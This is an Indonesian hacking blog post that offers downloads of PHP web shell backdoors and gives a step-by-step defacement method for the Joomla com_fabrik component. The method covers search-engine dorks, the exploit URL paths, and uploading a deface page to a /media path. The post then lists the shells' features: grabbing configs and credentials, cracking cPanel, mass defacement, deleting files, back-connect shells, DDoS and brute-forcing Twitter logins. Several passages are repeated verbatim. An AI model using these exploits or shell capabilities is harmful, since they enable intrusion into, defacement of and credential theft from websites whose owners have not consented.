Sabtu, 20 Mei 2017
Shell Backdoor M3R1 V.2
Hello guys! kali ini gua bakal bagiin shell backdoor M3R1 V.2
Sorry klo gaada screenshot nya :V
Download
Sorry klo gaada screenshot nya :V
Download
Cara Deface Dengan Com_Fabrik
Langsung aja Sob!
Dork:
inurl;/index.php?option=com_fabrik
inurl:/index.php/component/fabrik site:com
inurl:/index.php?option=com_fabrik&view=site:com
inurl:importcsv.php site:com
Kembangkan sendiri sob!
Exploit:
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
1.Dorking di om google
2.Pilih salah satu web
3.Masukan exploit
Example:www.target.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Jika vuln maka ada tempat upload filenya
5.Upload script deface kalian
6.File Aksesnya /media/NamaScriptLu.html
Example:www.target.com/media/crotz.html
Jadi deh!! :V
IndoXploit Shell Backdoor First Editon V.2
K-RDP Shell
-> Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.
Back Connect
CPanel/FTP Auto Deface:
-> Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp saja. tidak semuanya bisa
hanya web yang ftp nya sama dengan user/pass cpanel nya yang bisa otomatis di deface
Config Grabb :
-> Popoji CMS
-> Voodoo CMS
-> Wordpress
-> Joomla
-> Drupal
-> Magento
-> Ellislab Devteam [CI]
-> Opencart
-> Prestashop
-> phpBB
-> Lokomedia
-> Sitelook
-> Bosweb
-> WHMCS
-> Cpanel
Jumping [error fixed] :
Jumping hpshere & Jumping /var/vhosts [ updated ]
Kelebihannyaa bisa langsung ambil nama domainnyaa :
Cpanel Crack [blank user/pass fixed]:
Fitur ini udah otomatis Grab Passwordnyaa dan juga otomatis mengambil info domain nya, ikutin saja petunjuknya .
SMTP Grabber :
Hanya mengambil info smtp joomla yg ada di config.
Auto edit user / MPC :
Udah otomatis edit seluruh user admin dari config *ga semuanya , cuma beberapa cms aja
Penampakan Shell
No Name Shell Backdoor
Fitur :
- Mass Tools :
- Mass Deface 1 Dir
- Mass Deface All Dir
- Sabun Massal Di Tempat
- Sabun Massal Bunuh Diri
- Mass Delete Files
- Config :
-> Voodoo CMS [updated]
-> Wordpress-> Joomla
-> Drupal
-> Magento
-> Ellislab Devteam [CI]
-> Opencart
-> Prestashop
-> phpBB
-> Lokomedia
-> Sitelook
-> Bosweb
-> WHMCS
-> Cpanel
- Config V.2 :
Apa bila Config yg 1 nya error ... bisa menggunakan config v.2 ini
- SymConfig :
Grabb Config Dari Symlink ... jadi ngak usah cpek" cari 1 1 config di symlink ... tinggal symconfig sadjah langsung kena
Grabb Config Dari Symlink ... jadi ngak usah cpek" cari 1 1 config di symlink ... tinggal symconfig sadjah langsung kena
- Jumping [error fixed] :
Kelebihannyaa bisa langsung ambil nama domainnyaa
- K-RDP Shell
-> Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.
-> Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.
- CPanel/FTP Auto Deface: [ updated ]
-> Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp saja. tidak semuanya bisa
hanya web yang ftp nya sama dengan user/pass cpanel nya yang bisa otomatis di deface
-> Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp saja. tidak semuanya bisa
hanya web yang ftp nya sama dengan user/pass cpanel nya yang bisa otomatis di deface
- Zone - H :
Mass Notify hasil deface ke zone-h.org
- Defacer.id :
Mass Notify hasil deface ke defacer.id
- Bypass vHost :
Buat symlink apa bila kgk bisa di symlink :v :V
- Auto Edit User :
Udah otomatis edit seluruh user admin dari config *ga semuanya , cuma beberapa cms aja
Disetiap tools tertentu ada "NB" ikutin petunjuknya sajaa.Udah otomatis edit seluruh user admin dari config *ga semuanya , cuma beberapa cms aja
- Auto Deface Wordpress
- Auto Deface Wordpress V.2
- Auto Edit Title Wordpress
- Encode/Decode :
Untuk Encode Atau Decode Script
Untuk Encode Atau Decode Script
- vB Index Changer
- Multi Config
- DB Dump
Database Dump ... untuk mengambil db
Database Dump ... untuk mengambil db
- Inject Code
- Bypass Etc/Passw
Bypass ini biasa di gunakan untuk grabb config ... bisa menggunakan config v.2
- CSRF Exploiter
- Wp Auto Hijack
- CGI Telnet
- Adminer
Untuk Login ke database
- Fake Root
- DDoS
- HashID
mencari indentitas dari suatu hash
- Reverse IP
- Admin Finder [Fix Error]
- WHMCS Decoder
- Hash Generate
Untuk Membuat Hash dari Mulai md5,md4,md6 with salt,MD5 with Salt & Sha1 ,sha1,sha256,sha1 with salt, sha1 with salt & md5
- Port Scanner
Mencari port yg terbuka
- Domains Viewer
mencari domain dalam satu server
- Back Connect [ updated ]
- Back Connect V.2
- Disable Functions
mendisable fungsi yg enable menggunakan php.ini dan .htaccess
- NginDexer
auto deface wordpress dan joomla
- BruteForce Twitter
Download:Disini
Disini (Mini Size)
Langganan:
Komentar (Atom)